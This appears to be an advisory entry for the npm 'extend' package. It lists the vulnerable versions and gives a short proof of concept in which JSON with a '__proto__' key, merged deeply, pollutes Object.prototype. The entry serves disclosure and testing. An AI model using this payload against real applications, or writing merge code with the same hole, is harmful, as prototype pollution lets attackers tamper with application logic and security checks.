Port of jQuery.extend for node.js and the browser
Latest version: 3.0.2
const extend = require('extend');
extend(true, {}, JSON.parse('{"__proto__": {"a": "b"}}'));
if (({}).a === 'b') console.log('exploitable');Vulnerable versions: 1.1.3 1.2.0 1.2.1 1.3.0 2.0.0 2.0.1 3.0.0 3.0.1